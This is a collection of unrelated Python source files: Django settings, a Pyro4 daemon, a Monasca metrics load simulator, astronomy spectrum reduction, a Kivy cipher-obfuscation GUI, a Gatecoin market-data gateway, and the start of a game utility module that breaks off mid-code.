# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
worker_daemon.py
|
from threading import Thread
import Pyro4
from pbt.network import Daemon
@Pyro4.expose
class WorkerDaemon(Daemon):
def __init__(self, worker):
self.worker = worker
self.pyro_daemon = None
@property
def worker_id(self):
return self.worker.worker_id
def start(self):
self.pyro_daemon = Pyro4.Daemon(host=self._get_hostname())
uri = self.pyro_daemon.register(self)
thread = Thread(target=self.pyro_daemon.requestLoop)
thread.start()
return uri
def ping(self):
return True
def stop(self):
self.worker.stop()
self.pyro_daemon.shutdown()
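# A minimal usage sketch (the wrapped worker only needs worker_id and stop(),
# per the delegating methods above):
#   daemon = WorkerDaemon(worker)
#   uri = daemon.start()           # serves requests in a background thread
#   Pyro4.Proxy(uri).ping()        # reachable from other processes
#   daemon.stop()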
|
agent_simulator.py
|
import os
import random
import socket
import sys
import time
import multiprocessing
import argparse
import uuid
import yaml
import metric_simulator
from monascaclient import client
from monascaclient import ksclient
from monascaclient import exc
wait_time = 30
no_wait = False
number_of_agents = int(os.environ.get('NUM_AGENTS', '0'))
number_of_containers = int(os.environ.get('NUM_CONTAINERS', '10'))
number_of_metrics = int(os.environ.get('NUM_METRICS', '1310'))
class AgentInfo:
def __init__(self):
pass
keystone = {}
monasca_url = ''
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--number_agents", help="Number of agents to emulate sending metrics to the API", type=int,
required=False, default=30)
parser.add_argument("--run_time",
help="How long, in mins, collection will run. Defaults to run indefinitely until the user hits"
" control c", required=False, type=int, default=None)
parser.add_argument("--no_wait", help="Send measurements as fast as possible", action="store_true")
return parser.parse_args()
def get_token(keystone):
try:
ks_client = ksclient.KSClient(**keystone)
except Exception as ex:
print 'Failed to authenticate: {}'.format(ex)
return None
return ks_client.token
def create_metric_list(process_number, container_names):
metrics = []
for i in xrange(number_of_metrics):
epoch = int(time.time()) - 120
metrics.append({"name": "perf-parallel-" + str(i),
"dimensions": {"perf-id": str(process_number),
"zone": "nova",
"service": "compute",
"resource_id": "34c0ce14-9ce4-4d3d-84a4-172e1ddb26c4",
"tenant_id": "71fea2331bae4d98bb08df071169806d",
"hostname": socket.gethostname(),
"component": "vm",
"control_plane": "ccp",
"cluster": "compute",
"cloud_name": "monasca",
"container": container_names[i % len(container_names)]},
"timestamp": epoch * 1000,
"value": i})
# can make it an argument
percentage_of_known_metrics = 10
known_metric_generator = metric_simulator.generate_metrics()
# insert known metrics randomly into dummy metrics.
# known_metric_generator can generate known_metrics indefinitely
    for _ in xrange(number_of_metrics * percentage_of_known_metrics / 100):
        insert_position = random.randint(0, number_of_metrics - 1)
known_metric = known_metric_generator.next()
metrics.insert(insert_position, known_metric)
return metrics
def send_metrics(agent_info, process_number):
container_names = [uuid.uuid4().hex for i in range(number_of_containers)]
if not no_wait:
time.sleep(random.randint(0, 60))
token = get_token(agent_info.keystone)
if token is None:
return
while True:
try:
mon_client = client.Client('2_0', agent_info.monasca_url, token=token)
start_send = time.time()
metrics = create_metric_list(process_number, container_names)
mon_client.metrics.create(jsonbody=metrics)
end_send = time.time()
secs = end_send - start_send
if not no_wait:
                time.sleep(max(0, wait_time - secs))  # a send that took longer than wait_time must not raise
except KeyboardInterrupt:
return
except exc.HTTPUnauthorized:
token = get_token(agent_info.keystone)
def parse_agent_config(agent_info):
agent_config_file = open('/etc/monasca/agent/agent.yaml')
agent_config = yaml.load(agent_config_file)
agent_info.keystone['username'] = agent_config['Api']['username']
agent_info.keystone['password'] = agent_config['Api']['password']
agent_info.keystone['auth_url'] = agent_config['Api']['keystone_url']
agent_info.keystone['project_name'] = agent_config['Api']['project_name']
agent_info.monasca_url = agent_config['Api']['url']
def agent_simulator_test():
global no_wait
args = parse_args()
no_wait = args.no_wait
num_processes = number_of_agents or args.number_agents
agent_info = AgentInfo()
parse_agent_config(agent_info)
process_list = []
for i in xrange(num_processes):
p = multiprocessing.Process(target=send_metrics, args=(agent_info, i))
process_list.append(p)
for p in process_list:
p.start()
if args.run_time is not None:
time.sleep(args.run_time * 60)
for p in process_list:
p.terminate()
else:
try:
for p in process_list:
try:
p.join()
except Exception:
pass
except KeyboardInterrupt:
pass
if __name__ == "__main__":
sys.exit(agent_simulator_test())
|
boss.py
|
import numpy as np
import os
import pdb
import matplotlib.pyplot as plt
from pydl.pydlutils import yanny
from pyvista import imred, spectra, sdss
from tools import match,plots
from ccdproc import CCDData
import multiprocessing as mp
def visit(planfile,tracefile=None) :
""" Reduce BOSS visit
        Driver for parallel processing of b and r channels
Makes plots of median counts vs mag
"""
# reduce b1 and r1 in parallel
procs=[]
for channel in [0,1] :
kw={'planfile' : planfile, 'channel' : channel, 'clobber' : False}
procs.append(mp.Process(target=do_visit,kwargs=kw))
for proc in procs : proc.start()
for proc in procs : proc.join()
plan=yanny.yanny(planfile)
objs=np.where(plan['SPEXP']['flavor'] == b'science')[0]
fig,ax=plots.multi(1,2)
allmags=[]
allinst=[]
for channel in [0,1] :
mags=[]
inst=[]
for obj in objs :
name=plan['SPEXP']['name'][obj][channel].astype(str)
print(name)
out=CCDData.read(name.replace('sdR','sp1D'))
mapname=plan['SPEXP']['mapname'][obj].astype(str)
if mapname == 'fps' :
plug=sdss.config(out.header['CONFID'],specid=1)
isky=np.where(plug['category'] == b'sky_boss')[0]
else :
plug=sdss.config(os.environ['MAPPER_DATA_N']+'/'+mapname.split('-')[1]+'/plPlugMapM-'+mapname+'.par',specid=1,struct='PLUGMAPOBJ')
isky=np.where(plug['objType'] == b'SKY')[0]
i1,i2=match.match(np.arange(500)+1,plug['fiberId'])
if channel == 0 :
mag='g'
imag=1
else :
mag='i'
imag=3
skyfiber=plug['fiberId'][isky]
sky=np.median(out.data[skyfiber-1,:])
print(len(skyfiber),sky)
rad=np.sqrt(plug['xFocal'][i2]**2+plug['yFocal'][i2]**2)
plots.plotp(ax[channel],plug['mag'][i2,imag],2.5*np.log10(np.median((out.data-sky)/out.header['EXPTIME'],axis=1))[i1],color=None,
zr=[0,300],xr=[10,20],yr=[0,5],size=20,label=name,xt=mag,yt='-2.5*log(cnts/exptime)')
mags.append(plug['mag'][i2,imag])
inst.append(-2.5*np.log10(np.median((out.data-sky)/out.header['EXPTIME'],axis=1))[i1])
ax[channel].grid()
ax[channel].legend()
allmags.append(mags)
allinst.append(inst)
fig.suptitle(planfile)
fig.tight_layout()
fig.savefig(planfile.replace('.par','.png'))
return allmags,allinst
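# Example invocation (hypothetical plan file name):
#   allmags, allinst = visit('spPlan-test.par')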
def do_visit(planfile=None,channel=0,clobber=False,nfibers=50) :
""" Read raw image (eventually, 2D calibration and extract,
using specified flat/trace
"""
plan=yanny.yanny(planfile)
# are all files already created?
    done = True
    objs=np.where(plan['SPEXP']['flavor'] == b'science')[0]
    for obj in objs :
        name=plan['SPEXP']['name'][obj][channel].astype(str)
        if not os.path.exists(name) or clobber : done = False
    if done : return
# set up Reducer
red=imred.Reducer('BOSS',dir=os.environ['BOSS_SPECTRO_DATA_N']+'/'+plan['MJD'])
# make Trace/PSF
iflat=np.where(plan['SPEXP']['flavor'] == b'flat')[0]
name=plan['SPEXP']['name'][iflat][0][channel].astype(str)
if os.path.exists(name.replace('sdR','spTrace')) and not clobber :
trace=spectra.Trace('./'+name.replace('sdR','spTrace'))
else :
flat=red.reduce(name,channel=0)
trace=spectra.Trace(transpose=red.transpose,rad=3,lags=np.arange(-3,4))
ff=np.sum(flat.data[2000:2100],axis=0)
if channel==0 : thresh=0.4e6
else : thresh=0.2e6
peaks,fiber=spectra.findpeak(ff,thresh=thresh)
print('found {:d} peaks'.format(len(peaks)))
trace.trace(flat,peaks[0:nfibers],index=fiber[0:nfibers])
trace.write(name.replace('sdR','spTrace'))
# reduce and extract science frames
objs=np.where(plan['SPEXP']['flavor'] == b'science')[0]
for obj in objs :
name=plan['SPEXP']['name'][obj][channel].astype(str)
if os.path.exists(name.replace('sdR','sp1D')) and not clobber :
out=CCDData.read(name.replace('sdR','sp1D'))
else :
im=red.reduce(name,channel=channel)
out=trace.extract(im,threads=1,nout=500)
out.write(name.replace('sdR','sp1D'),overwrite=True)
return out
|
threading-simpleargs.py
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import threading
def worker(num):
"""thread worker function"""
print 'worker: %s' % num
return
threads = []
for i in range(5):
t = threading.Thread(target=worker, args=(i, ))
threads.append(t)
t.start()
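# Optionally wait for all workers before the script exits (a small addition,
# not part of the original sample):
for t in threads:
    t.join()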
|
forin.py
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.uix.textinput import TextInput
from kivy.uix.gridlayout import GridLayout
from kivy.config import Config
from kivy.uix.switch import Switch
import random
from kivy.lang.builder import Builder
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.scrollview import ScrollView
from kivy.core.window import Window
from kivy.app import runTouchApp
import threading
import os
#Config.set('graphics','resizable','0')  # lock the window size so it cannot be resized
Config.set('graphics','width','655')
Config.set('graphics','height','825')
alfaw=['A','B','C','D','E','F','G','L','J','K','I','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','l','j','k','i','m','n','o','p','q','r','s','t','u','v','w','x','y','z','А','Б','В','Г','Е','Ё','Ж','З','И','Й','К','Л','М','Н','О','П','Р','С','Т','У','Ф','Х','Ц','Ч','Ш','Щ','Ъ','Ы','Ь','Э','Ю','Я','а','б','в','г','д','е','ё','ж','з','и','й','к','л','м','н','о','п','р','с','т','у','ф','х','ц','ч','ш','щ','ъ','ы','ь','э','ю','я',' ',',','.','<','>',':',';','?','/','!','@','#','№','$','|','%','&','*','(',')','-','+','_','=','^','0','1','2','3','4','5','6','7','8','9']
class Подготовить_для_передачи_шифр(App):
    def callback(self,instance, value):
        #print('the switch', instance, 'is', value)
        self.ghi = not self.ghi  # toggle the "add random symbols" flag
def obrabot(self,args):
g=open('shif/0.txt','r')
f=len(g.read())
g.close()
d=random.randint(10*f,69*f)
g=open('kwo.txt','r')
kwo=int(g.read())
g.close()
g=open('shif/kol.txt','r')
kol=int(g.read())
g.close()
alfaw=[]
g=open('layout.txt','r', encoding='utf-8')
fg=str("alfaw += "+g.read())
g.close()
exec(fg)
#print(f,kwo,kol,alfaw)
try:
            sm=int(self.ns.text)  # number of fake ciphers per each real cipher
            nrsh=int(self.ns1.text)  # position of the real cipher among the fakes
            sme=int(self.ns2.text)  # Caesar-style offset applied to the cipher variants
            smc=int(self.ns4.text)  # shift for Caesar-encrypting the whole output
            kss=int(self.ns5.text)  # number of Caesar encryption layers
if sm>0 and nrsh>0 and sme>=0 and smc>=0 and kss>=0:
if nrsh<sm:
if kwo*sm>sme:
if kwo>smc:
if kss<1:
kss=1
loe=[]
#print(loe)
if int(f/2)>2 and self.ghi==1:
self.add_sh_s=random.randint(2,int(f/2))
else:
if self.ghi==1:
self.add_sh_s=random.randint(2,4)
if nrsh==0:
nrsh=1
b=""
k=[]
po=0
n=0
oi=""
vb=""
for e in range(kwo*kol*sm):
if po==sm:
po=0
if po==nrsh:
fv=open('shif/'+str(n)+'.txt','r')
vb=fv.read()
b+=vb
fv.close()
n+=1
if self.ghi==1:
for v in range(self.add_sh_s):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
oi+=alfaw[rop]
k.extend([vb+oi])
vb=""
oi=""
po+=1
else:
po+=1
for jk in range(f):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
oi+=alfaw[rop]
if self.ghi==1:
for v in range(self.add_sh_s):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
oi+=alfaw[rop]
k.extend([oi])
oi=""
if sme>0:
for y in range(len(k)):
if y+sme<len(k):
loe.extend([k[y+sme]])
else:
#kwo-y+sme
loe.extend([k[(-1*(len(k)-y))+sme]])
b=""
for l in range(len(loe)):
b+=loe[l]
for v in range(d):
rop=random.randint(0,kwo-1)
b+=alfaw[rop]
gj=open('shif for shipment/шифр.txt','w')
gj.write(b)
gj.close()
self.ns3.text=b
self.kah.text=str(self.add_sh_s)
gl=""
qw=b
if smc>0:
for d in range(kss):
for z in range(len(b)):
for n in range(len(alfaw)):
if b[z]==alfaw[n]:
if n+smc<=len(alfaw)-1:
gl+=alfaw[n+smc]
if n+smc>len(alfaw)-1:
#print(len(b),n)
#print(-1*(len(alfaw)-n)+smc)
gl+=alfaw[-1*(len(alfaw)-n)+smc]
break
b=gl
gl=""
if smc>0:
for d in range(kss):
for z in range(len(b)):
for n in range(len(alfaw)):
if b[z]==alfaw[n]:
if n-smc<=len(alfaw)-1:
gl+=alfaw[n-smc]
if n-smc>len(alfaw)-1:
#print(len(b),n)
#print((len(alfaw)+n)-smc)
gl+=alfaw[(len(alfaw)+n)-smc]
break
b=gl
if self.ghi==False:
self.add_sh_s=0
threading.Thread(target=lambda: os.system('увед 2.py')).start()
print(1111)
else:
print(1116)
threading.Thread(target=lambda: os.system('ош6.py')).start()
else:
print(1115)
threading.Thread(target=lambda: os.system('ош5.py')).start()
else:
print(1114)
threading.Thread(target=lambda: os.system('ош4.py')).start()
else:
print(1113)
threading.Thread(target=lambda: os.system('ошm.py')).start()
except:
print(1112)
threading.Thread(target=lambda: os.system('ош3.py')).start()
def build(self):
self.ghi=0
bl=GridLayout(cols=1, spacing=10, size_hint_y=None)
bl.bind(minimum_height=bl.setter('height'))
self.k=Label(text="Шифр обработанный для передачи в сети интернет сохранится в папке shif for",size_hint_y=None, height=40)
bl.add_widget(self.k)
self.k2=Label(text="shipment.Указанные настройки запомните и заранее обговорите их с получателем шифра",size_hint_y=None, height=40)
bl.add_widget(self.k2)
self.ns=TextInput(size_hint_y=None, height=40)
bl.add_widget(Label(text="сколько составить лживых шифров на каждый реальный"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns)
bl.add_widget(gr)
self.ns1=TextInput(size_hint_y=None, height=40)
bl.add_widget(Label(text="под каким номером из лживых шифров будет находится реальный шифр"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns1)
bl.add_widget(gr)
self.ns2=TextInput(size_hint_y=None, height=40,text="0")
bl.add_widget(Label(text="смещение вариантов шифра как в шифре Цезаря"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns2)
bl.add_widget(gr)
self.ns4=TextInput(size_hint_y=None, height=40,text="0")
bl.add_widget(Label(text="Шифрование обработаного шифра шифром Цезаря введите смещение"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns4)
bl.add_widget(gr)
self.ns5=TextInput(size_hint_y=None, height=40,text="0")
bl.add_widget(Label(text="Количество слоёв шифрования обработаного шифра шифром Цезаря"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns5)
bl.add_widget(gr)
lk=Button(text="Обработать для передачи в сети",size_hint=(0.7,1),on_press=self.obrabot)
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(lk)
bl.add_widget(gr)
bl.add_widget(Label(text="Добавить к каждому варианту шифрования символа случайные символы"))
switch = Switch(size_hint_y=None, height=40)
switch.bind(active=self.callback)
bl.add_widget(switch)
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(Label(text="Количество случайных символов добавленных к каждому варианту шифрования"))
bl.add_widget(gr)
self.add_sh_s=0
self.kah=Label(text=str(self.add_sh_s))
bl.add_widget(self.kah)
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(Label(text="Количество букв на шифр каждой буквы"))
        x=open('shif/0.txt','r')
z=str(len(x.read()))
x.close()
gr.add_widget(Label(text=z))
bl.add_widget(gr)
bl.add_widget(Label(text="Обработанный шифр"))
self.ns3=TextInput(size_hint_y=None, height=180)
bl.add_widget(self.ns3)
root = ScrollView(size_hint=(1, None), size=(Window.width, Window.height))
root.add_widget(bl)
return root
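# A standalone sketch of the layered Caesar shift that obrabot applies with
# smc/kss above; cyclic indexing replaces the original wrap-around branches
# (characters outside the alphabet are assumed not to occur):
def _caesar_shift(text, shift, alphabet=alfaw):
    return ''.join(alphabet[(alphabet.index(ch) + shift) % len(alphabet)] for ch in text)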
if __name__=="__main__":
Подготовить_для_передачи_шифр().run()
|
gatecoin.py
|
from bitfeeds.socket.restful import RESTfulApiSocket
from bitfeeds.exchange import ExchangeGateway
from bitfeeds.market import L2Depth, Trade
from bitfeeds.util import Logger
from bitfeeds.instrument import Instrument
from bitfeeds.storage.sql_template import SqlStorageTemplate
import time
import threading
from functools import partial
from datetime import datetime
class GatecoinBroker(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_trade_timestamp_field_name(cls):
return 'transactionTime'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_price_field_name(cls):
return 'price'
@classmethod
def get_order_book_volume_field_name(cls):
return 'volume'
@classmethod
def get_trade_side_field_name(cls):
return 'way'
@classmethod
def get_trade_id_field_name(cls):
return 'transactionId'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'quantity'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.gatecoin.com/Public/MarketDepth/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://api.gatecoin.com/Public/Transactions/%s?since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://api.gatecoin.com/Public/Transactions/%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
l2_depth = L2Depth()
# Bids
bids = raw[cls.get_bids_field_name()]
bid_level = -1
for bid in bids:
price = bid[cls.get_order_book_price_field_name()]
volume = bid[cls.get_order_book_volume_field_name()]
if bid_level == -1 or l2_depth.bids[bid_level].price != price:
bid_level += 1
if bid_level < 5:
l2_depth.bids[bid_level].price = float(price)
else:
break
l2_depth.bids[bid_level].volume += float(volume)
# Asks
asks = raw[cls.get_asks_field_name()]
ask_level = -1
for ask in asks:
price = ask[cls.get_order_book_price_field_name()]
volume = ask[cls.get_order_book_volume_field_name()]
if ask_level == -1 or l2_depth.asks[ask_level].price != price:
ask_level += 1
if ask_level < 5:
l2_depth.asks[ask_level].price = float(price)
else:
break
l2_depth.asks[ask_level].volume += float(volume)
return l2_depth
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trade_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trade_timestamp_field_name()])
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
            # Trade side (the raw 'way' field is not mapped here; always recorded as 1)
            trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if 'transactions' in res.keys():
trades_raw = res['transactions']
if len(trades_raw) > 0:
for t in trades_raw:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
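# A minimal polling sketch against the broker above (network access required;
# the Instrument constructor is used the same way in __main__ below, and the
# instrument's exchange trade id is assumed to be initialised):
#   instmt = Instrument('Gatecoin', 'BTCHKD', 'BTCHKD')
#   depth = GatecoinBroker.get_order_book(instmt)
#   trades = GatecoinBroker.get_trades(instmt)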
class ExchGwGatecoin(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_storages):
"""
Constructor
:param db_storage: Database storage
"""
        ExchangeGateway.__init__(self, GatecoinBroker(), db_storages)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Gatecoin'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
                time.sleep(1)
                continue  # ret is unbound after a failed request
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Gatecoin'
instmt_name = 'BTCHKD'
instmt_code = 'BTCHKD'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_storage = SqlStorageTemplate()
exch = ExchGwGatecoin([db_storage])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_order_book_table_name(exch.get_order_book_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_trades_table_name(exch.get_trades_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
util.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import stat
import shutil
import re
import time
import struct
import zipfile
import lhafile
import operator
import threading
import hashlib
import subprocess
import StringIO
import io
import traceback
import datetime
import ctypes
import ctypes.util
import array
import unicodedata
import functools
import webbrowser
import math
import itertools
if sys.platform == "win32":
import win32api
import win32con
import importlib
pythoncom = importlib.import_module("pythoncom")
win32shell = importlib.import_module("win32com.shell.shell")
import win32com.shell.shellcon
import pywintypes
import ctypes.wintypes
import msvcrt
import wx
import wx.lib.agw.aui.tabart
import wx.lib.mixins.listctrl
import wx.richtext
import pygame
import pygame.image
from pygame.locals import KEYDOWN, KEYUP, MOUSEBUTTONDOWN, MOUSEBUTTONUP, USEREVENT
import cw
#-------------------------------------------------------------------------------
# General-purpose classes
#-------------------------------------------------------------------------------
class MusicInterface(object):
def __init__(self, channel, mastervolume):
self.channel = channel
self.path = ""
self.fpath = ""
self.subvolume = 100
self.loopcount = 0
self.movie_scr = None
self.mastervolume = mastervolume
self._winmm = False
self._bass = False
self._movie = None
self.inusecard = False
def update_scale(self):
if self._movie:
self.movie_scr = pygame.Surface(cw.s(self._movie.get_size())).convert()
rect = cw.s(pygame.Rect((0, 0), self._movie.get_size()))
self._movie.set_display(self.movie_scr, rect)
def play(self, path, updatepredata=True, restart=False, inusecard=False, subvolume=100, loopcount=0, fade=0):
if not updatepredata:
            # when re-playing after a soundfont or skin change, etc.
subvolume = self.subvolume
loopcount = self.loopcount
self._play(path, updatepredata, restart, inusecard, subvolume, loopcount, fade)
def _play(self, path, updatepredata=True, restart=False, inusecard=False, subvolume=100, loopcount=0, fade=0):
        if threading.currentThread() != cw.cwpy:
cw.cwpy.exec_func(self._play, path, updatepredata, restart, inusecard, subvolume, loopcount, fade)
return
assert threading.currentThread() == cw.cwpy
if cw.cwpy.ydata and cw.cwpy.is_playingscenario():
cw.cwpy.ydata.changed()
fpath = self.get_path(path, inusecard)
self.path = path
if not cw.bassplayer.is_alivablewithpath(fpath):
return
if cw.cwpy.rsrc:
fpath = cw.cwpy.rsrc.get_filepath(fpath)
if not os.path.isfile(fpath):
self._stop(fade, stopfadeout=False, updatepredata=False)
else:
assert threading.currentThread() == cw.cwpy
            if restart or self.fpath != fpath:
self._stop(fade, stopfadeout=False, updatepredata=False)
self.set_volume()
self._winmm = False
self._bass = False
bgmtype = load_bgm(fpath)
            if bgmtype != -1:
filesize = 0
if os.path.isfile(fpath):
try:
filesize = os.path.getsize(fpath)
except Exception:
cw.util.print_ex()
if bgmtype == 2:
volume = self._get_volumevalue(fpath) * subvolume / 100.0
try:
cw.bassplayer.play_bgm(fpath, volume, loopcount=loopcount, channel=self.channel, fade=fade)
self._bass = True
except Exception:
cw.util.print_ex()
elif bgmtype == 1:
if sys.platform == "win32":
name = "cwbgm_" + str(self.channel)
mciSendStringW = ctypes.windll.winmm.mciSendStringW
mciSendStringW(u'open "%s" alias %s' % (fpath, name), 0, 0, 0)
volume = cw.cwpy.setting.vol_bgm_midi if is_midi(fpath) else cw.cwpy.setting.vol_bgm
volume = int(volume * 1000)
volume = volume * subvolume / 100
mciSendStringW(u"setaudio %s volume to %s" % (name, volume), 0, 0, 0)
mciSendStringW(u"play %s" % (name), 0, 0, 0)
self._winmm = True
elif cw.util.splitext(fpath)[1].lower() in (".mpg", ".mpeg"):
try:
encoding = sys.getfilesystemencoding()
self._movie = pygame.movie.Movie(fpath.encode(encoding))
volume = self._get_volumevalue(fpath) * subvolume / 100.0
self._movie.set_volume(volume)
